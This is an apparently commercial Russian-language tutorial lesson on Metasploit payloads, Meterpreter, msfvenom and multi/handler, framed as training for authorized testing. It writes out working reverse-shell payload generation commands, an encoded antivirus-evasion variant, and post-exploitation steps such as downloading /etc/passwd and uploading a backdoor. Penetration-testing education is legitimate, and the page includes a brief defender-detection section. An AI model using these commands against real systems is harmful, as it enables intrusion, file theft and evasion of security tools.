Полезные нагрузки: поэтапные и цельные, Meterpreter
Выбирайте подходящую полезную нагрузку для конкретного сценария и используйте Meterpreter после эксплуатации.
«Полезные нагрузки: поэтапные и цельные, Meterpreter» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Что такое полезная нагрузка
Полезная нагрузка — это код, который выполняется на цели после успешного эксплойта. Она определяет, что получает атакующий: оболочку, выполнение команд, доступ к файлам или полнофункциональный агент, например Meterpreter.
Многоэтапные и безэтапные полезные нагрузки
Безэтапные полезные нагрузки (/) содержат всё в одном двоичном файле — они больше, но проще и не требуют сетевого обратного вызова после первоначальной доставки. Многоэтапные полезные нагрузки (//) сначала отправляют небольшой загрузчик, который скачивает второй этап от обработчика.
# Stageless (single slash naming):
windows/x64/shell_reverse_tcp
# Staged (double slash naming):
windows/x64/shell/reverse_tcp
# ^
# stage 2 downloaded after stager connectsКогда использовать каждый вариант
Используйте безэтапные полезные нагрузки, если после первоначального эксплойта у цели нет доступа к интернету или обработчику — полезная нагрузка должна быть самодостаточной. Используйте многоэтапные, если вам нужна небольшая первоначальная полезная нагрузка и есть надёжное соединение с обработчиком.
Обзор Meterpreter
Meterpreter — это усовершенствованная полезная нагрузка Metasploit: она полностью работает в памяти, использует шифрованные соединения и предоставляет расширенный API для доступа к файловой системе, переноса процессов, перехвата нажатий клавиш, создания снимков экрана и перемещения через промежуточные узлы.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > runКоманды Meterpreter
Основные команды Meterpreter для постэксплуатации: сведения о системе, список процессов, операции с файлами и работа с сетью.
meterpreter > sysinfo # system information
meterpreter > getuid # current user
meterpreter > ps # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell # drop to OS shellПеренос процесса
Перенесите процесс Meterpreter в более стабильный или менее подозрительный процесс (например, explorer.exe в Windows). Это также может повысить привилегии при переносе в процесс с более высоким уровнем привилегий.
meterpreter > ps
meterpreter > migrate 1234 # migrate to PID 1234
# Migrate to explorer.exe for stability
# Avoids termination if original process exitsСоздание полезных нагрузок с помощью msfvenom
msfvenom создаёт отдельные файлы полезной нагрузки (EXE, ELF, APK и шелл-код) для доставки через фишинг, оставленные USB-накопители или веб-шеллы в рамках санкционированных проверок.
# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-f elf -o payload.elfMulti/Handler для получения оболочек
Вспомогательный модуль multi/handler принимает обратные подключения оболочки. Перед доставкой полезной нагрузки настройте его с теми же полезной нагрузкой, LHOST и LPORT, которые использовались в msfvenom.
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j # run as background jobОсновы кодирования и обхода защиты
Кодировщики msfvenom могут обфусцировать полезные нагрузки, чтобы обойти базовое обнаружение AV по сигнатурам. Обратите внимание: современные решения EDR используют поведенческое обнаружение — одних кодировщиков недостаточно против продвинутых средств защиты.
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e x64/xor_dynamic -i 5 \
-f exe -o encoded_payload.exeОбратные и привязанные полезные нагрузки
Обратные полезные нагрузки подключаются от цели к атакующему (что лучше работает при использовании NAT и межсетевых экранов). Привязанные полезные нагрузки прослушивают соединения на цели — атакующий подключается к ним. В большинстве сценариев предпочтительны обратные полезные нагрузки.
Обнаружение полезных нагрузок защитниками
Защитники обнаруживают Meterpreter с помощью сетевых сигнатур (характерные шаблоны трафика управления и контроля), сканирования памяти (артефакты отражающей инъекции DLL) и поведенческого анализа (опустошение процессов, необычные связи между родительскими и дочерними процессами).
Быстрая проверка
Чем многоэтапная полезная нагрузка в Metasploit отличается от безэтапной?
Итоги: полезные нагрузки и Meterpreter
Выбирайте многоэтапные полезные нагрузки для небольшого первоначального объёма и безэтапные — для самодостаточной доставки. Meterpreter — наиболее функциональная полезная нагрузка для постэксплуатации: работающая в памяти, шифрованная и расширяемая. Используйте msfvenom для создания отдельных двоичных файлов и всегда настраивайте multi/handler для приёма обратных подключений.
Часто задаваемые вопросы
Урок «Полезные нагрузки: поэтапные и цельные, Meterpreter» бесплатный?
Да — полный текст урока «Полезные нагрузки: поэтапные и цельные, Meterpreter» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Полезные нагрузки: поэтапные и цельные, Meterpreter»?
Выбирайте подходящую полезную нагрузку для конкретного сценария и используйте Meterpreter после эксплуатации. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.
Сколько времени занимает урок «Полезные нагрузки: поэтапные и цельные, Meterpreter»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit и msfconsole
- Эксплуатация известной уязвимости
- Полезные нагрузки: поэтапные и цельные, Meterpreter
- Постэксплуатация: перемещение и закрепление